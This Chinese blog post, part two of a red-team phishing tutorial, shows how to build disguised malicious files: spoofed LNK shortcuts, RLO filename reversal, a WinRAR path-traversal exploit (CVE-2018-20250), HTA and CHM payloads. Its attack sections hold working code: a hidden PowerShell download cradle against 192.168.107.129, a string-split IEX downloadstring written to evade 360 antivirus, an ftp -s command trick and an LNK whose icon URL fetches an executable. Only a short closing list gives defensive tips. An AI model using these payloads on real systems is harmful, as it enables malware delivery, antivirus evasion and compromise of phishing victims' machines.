红队测试之钓鱼攻击的应用(二)

0x01 Lnk:


lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。lnk钓鱼主要将图标伪装成正常图标,但是目标会执行shell命令。

lnk文件的载荷拥有自动隐藏.lnk后缀名,从而展现伪装的后缀名以欺骗目标的特点而被广泛使用。

以calc.exe的快捷方式为例,我们首先更改ico图标:

这里存在一个问题,如果用系统自带的ico去做文件图标替换的话会有个弊端,即当替换的ico在目标机器上不存在时,就会出现类似空白ico图标。我们可以通过修改lnk的icon_location标志位,修改为相关后缀,系统即可自动关联到对应的打开方式,达到自适配的效果

利用010 Editor打开lnk文件,找到String Data部分ICON_LOCATION字符串:

将其修改为./1.pdf:

效果展示:

修改ICON_LOCATION后,会根据目标机器上所安装的环境进行适配,以显示出符合本机环境的图标,加大了样本的成功几率

0x02 文件名反转(RLO)+ 超长文件名隐藏:


利用原理:

在windows下面,支持一种特殊的unicode字符RLO,一个字符串中如果有这个字符的话,那么在windows下显示时,就会把RLO右侧的字符串逆序显示出来。

在Windows中,如果我们直接修改文件后缀,会更改文件原本类型。但我们可以通过在文件名中插入此类unicode字符,来达到文件名反转的效果,实现文件名欺骗,而不更改文件原本类型。

以cmd.exe为例,将其重命名为cmdgpj.exe,然后在 cmd 与 g 之间右键选择插入Unicode控制字符,选择RLO。然后利用http://www.bitbug.net/将图片转为ico图标,再配合ResourceHacker修改图标。

利用windows目录默认显示文件名长度特性,进行修改将文件名加长隐藏后缀名。

或者可以新建一个bat文件,使用cs生成powershell木马,将其保存为test.bat。利用BAT2EXE导入前面创建的test.bat,然后将notepad添加到test.bat的顶部,将Exe格式更改为"隐形应用程序",以防止在目标用户打开文件时弹出任何终端,最后点击Convert。

转换成exe以后,利用RLO进行文件名反转,再添加记事本的图标来进行伪装。当用户关闭此txt时会新增一个powershell进程。这样做会使目标用户相信他们刚刚单击的文件确实是合法的文本文件,殊不知CS已悄然上线。

0x03 WinRAR目录穿越漏洞(CVE-2018-20250)


该漏洞是由于 WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在 2006 年被编译,没有任何的基础保护机制(ASLR, DEP 等)。动态链接库的作用是处理 ACE 格式文件。而WinRAR解压ACE文件时,由于没有对文件名进行充分过滤,导致其可实现目录穿越,将恶意文件写入任意目录,甚至可以写入文件至开机启动项,导致代码执行

  • 漏洞利用原理:

漏洞主要是由 WinRAR 用来解压ACE压缩包采用的动态链接库 unacev2.dll 这个dll引起的。unacev2.dll 中处理 filename 时只校验了 CRC,黑客可以通过更改压缩包的 CRC 校验码来修改解压时候的 filename,来触发这个Path Traversal漏洞。但是 WinRAR 本身检测了 filename,有一些限制并且普通用户解压 RAR 文件时候,并不能将我们恶意的 Payload 解压到需要 System 权限的文件夹。

当用户将文件下载到默认的C:\Users\test\Downloads目录下时,我们通过构造C:\C:C:../AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\test.exe
经过 WinRAR 的 CleanPath 函数处理之后,会变成:C:../AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\test.exe

其中 C: 会被转换成当前路径,如果用 WinRAR 打开那么当前路径就是C:\Program Files\WinRAR,要是在文件夹中右键解压到 xxx,那么当前路径就是压缩包所在的路径。

当用户在文件夹中直接右键解压到 xx,那么我们恶意的 payload 解压地址就会变成:C:\Users\test\Downloads../AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\test.exe
就是当前用户的启动项。这样一个利用完成了从一个Path Traversal到任意命令执行的过程。

补充:如果解压缩软件并非目标版本,则提示解压失败或者不是一个正常的压缩包。

  • 漏洞危害:

1、通过这个漏洞黑客可以将恶意程序(挖矿、勒索、间谍、anything)放入用户启动项,当目标电脑重新启动时获取目标主机的权限。
2、在拥有system权限下可以放入c:/windows/system32/wbem/mof/nullevt.mof,直接在获取目标主机的权限。
3、可以投放恶意dll文件进行dll劫持获取到目标主机的权限,或者覆盖用户主机上的文件等方式获取目标主机的权限

  • 漏洞影响范围:
  • WinRAR < 5.70 Beta 1
  • Bandizip <= 6.2.0.0
  • 好压(2345压缩) <= 5.9.8.10907
  • 360压缩 <= 4.0.0.1170

漏洞利用exp:https://github.com/WyAtu/CVE-2018-20250

制作好CS马后,将其复制到项目文件中,修改exp.py文件中的evil_filename:

修改python3的运行命令

运行exp.py后,将生成的恶意test.rar文件传到win7靶机中的download目录中

使用WINRAR解压文件,解压后会在自启动目录生成一个恶意文件hi.exe,我们可以运行shell:startup进行查看

更多利用方式请参考:WinRAR(CVE-2018-20250)漏洞利用再升级 减少重启系统的依赖

0x04 HTA:


HTA是HTML Application的缩写,直接将HTML保存成HTA的格式,是一个独立的应用软件,本身就是html应用程序,双击就能运行,却比普通网页权限大得多,它具有桌面程序的所有权限。

Cobalt Strike也支持HTA钓鱼文件的生成,提供了3种生成方式 exe,powershell,vba

生成方式:Attack>Packages>HTML Application

其中VBA方法需要目标系统上的Microsoft Office,在系统支持的情况下我们一般选择powershell,因为这种方式更加容易免杀。通常我们结合host File(文件下载功能),生成一个下载恶意HTA的网址来实行钓鱼。

0x05 CHM:


CHM(Compiled Help Manual)即“已编译的帮助文件”。它是微软新一代的帮助文件格式,利用HTML作源文,把帮助内容以类似数据库的形式编译储存。CHM支持Javas cript、VBs cript、ActiveX、Java Applet、Flash。
常见图形文件(GIF、JPEG、PNG)、音频视频文件(MID、WAV、AVI)等等,并可以通过URL与Internet联系在一起。因为使用方便,形式多样也被采用作为电子书的格式。

创建一个文件夹,在文件夹里面再创建两个文件夹和一个index.html文件。index.html文件内容如下:

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec 
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=',calc.exe'>
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

使用EasyCHM进行编译后,打开生成的CHM文件,就会弹出计算器:

利用powershell上线CS:

注意:exe后面要再加一个英文版逗号否则无法执行exe,还要注意payload字符串的双引号跟单引号是否冲突

使用CHM执行powershell脚本,但唯一不足就是会弹出黑框。这里可以利用MyJSRat配合chm进行上线

python2 MyJSRat.py -i 192.168.107.129 -p 8555

然后访问下 url:http://192.168.107.129:8555/wtf

将payload复制到index.html文件中,然后重新编译CHM。

受害者打开chm文件后,触发Payload可无弹窗运行命令:

实际钓鱼的过程中,可以用正常chm文档进行伪装,将其转成html:

hh -decompile .\\html CHM.CHM

钓鱼html payload复制修改,嵌入到IBurpCollaboratorClientContext.html文件中

0x06 拓展一:


1、新建一个指向%windir%/System32/mshta.exe的快捷方式(文件名尽量带有迷惑性),并更改其图标为%SystemRoot%/System32/SHELL32.dll中任意一个
2、利用CS生成一个HTA文件,并利用Host File模块生成两个下载地址。其中一个指向正常的pdf文件,还有一个指向HTA文件
3、编辑HTA文件,于其执行payload前增加如下语句(用于下载诱饵文档并且进行打开,同时诱饵文档的显示有多种方法,这里只是举一个例子):

Dim open_pdf
Set open_pdf = CreateObject("Wscript.Shell")
open_pdf.run "powershell -nop -w hidden (new-object System.Net.WebClient).DownloadFile('http://192.168.107.129/1.pdf',$env:temp+'/2022最新薪资架构制度.pdf');Start-Process $env:temp'/2022最新薪资架构制度.pdf'", 0, true

利用上述方法,将lnk文件修改为自适应的pdf的图标,效果如下:

然后发送给靶机win7,双击该LNK文件,主机便会上线,而受害者会看到一正常的PDF文档:

0x07 拓展二:


利用原理:

  • 利用ftp参数!可以执行系统命令
  • -s:filename(指定包含 FTP 命令的文本文件;命令在FTP启动后自动运行。此参数中没有空格。)

利用以上两点达到命令执行的效果

  • 利用过程:

1、创建一个快捷方式(参数混淆绕过360):

2、新建一个aaa.dll,内容为执行当前目录下的1.ps1文件:!cmd /k powershell -exec bypass .\1.ps1

3、1.ps1内容为CS上线命令,这里使用使用拼接的方式替换关键词,可绕过360的检测:

$c3 ='IEX';
$c6='(new-object net.webc';
$c7='lient).downlo';
$c8='adstr';
$c9 ='ing(''http://192.168.107.129:80/abc'')';
IEX ($c3+$c6+$c7+$c8+$c9)

0x08 拓展三:


  • 快捷方式图标下载执行exe

操作系统不仅会从本地驱动器加载外部图标文件,还会尝试从以 UNC 格式指定的远程路径或者通过URL加载。当文件资源管理器显示 LNK 文件时,会尝试加载图标,如果图标由 UNC 或 URL 路径指定存在,它将被下载并显示。当计算机获取文件之后会像链接请求并缓存到:%USERPROFILE%\AppData\Local\Microsoft\Windows\INetCache

注意:ICON_LOCATION 字符串的限制:必须以.ico结尾

直接用ps1生成快捷方式:

$shell = New-Object -ComObject WScript.Shell
$shortcut = $shell.CreateShortcut("C:\users\sws123\desktop\aaaa.lnk")
$shortcut.TargetPath = "C:\windows\system32\cmd.exe"
$shortcut.Arguments = ' /c "cd %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCache & dir /s /B calc*.exe | cmd.exe /k" '
$shortcut.IconLocation = "http://192.168.107.129:8000/calc.exe?.ico"
$shortcut.Save()

当在文件资源管理器中打开 LNK 所在的文件夹时,操作系统将尝试使用 HTTP GET 请求下载 URL 指定的文件:

生成的 HTTP GET 请求将导致将calc.exe下载到路径 %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCache(在 W10 机器上)中的某个位置,名称为 calc[1].exe

由于文件路径是基本确定的,可以通过lnk文件修改链接指向cmd并执行它

  • 利用方式:

制作一个特殊的 LNK 文件,将其压缩并通过网络钓鱼电子邮件发送出去,或者将 LNK 上传到多个用户使用的网络文件共享

详情请参考:Using Shell Links as zero-touch downloaders and to initiate network connections

钓鱼邮件防范措施:

对公司来说:

1)组织员工进行钓鱼邮件防范培训,提高全员网络空间安全防范意识;
2)在公司内部不定期进行钓鱼邮件安全测试,及时发现问题并采取补救措施;
3)使用高安全性邮件系统,并及时配置安全过滤机制;
4)敦促员工安装杀毒软件,并及时更新病毒库.

对个人来说:

1)认真学习CNCERT发布的《钓鱼邮件攻击防范指南》,做到“五要”“五不要”,增强安全防范意识;
2)不要轻信发件人地址显示的“显示名”,遇到索要敏感信息的邮件需要及时通过电话核实;
3)切忌轻易打开邮件中文中的短链接,谨防上当受骗,造成财物损失;
4)安装杀毒软件,邮件附件运行前先进行病毒查杀.

参考如下:


基于钓鱼攻击的技术点研究
红队攻防之CHM文档钓鱼
红蓝对抗之邮件钓鱼攻击
HW在即——红队活动之Lnk样本载荷篇
【漏洞复现】WinRAR目录穿越漏洞(CVE-2018-20250) - 爱码网
渗透地基钓鱼篇-Cobalt Strike钓鱼
黑客实战经常用到的钓鱼绕过骚操作

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
禁止转载,如需转载请通过简信或评论联系作者。
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,293评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,604评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 150,958评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,729评论 1 277
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,719评论 5 366
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,630评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,000评论 3 397
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,665评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,909评论 1 299
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,646评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,726评论 1 330
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,400评论 4 321
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,986评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,959评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,197评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 44,996评论 2 349
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,481评论 2 342

推荐阅读更多精彩内容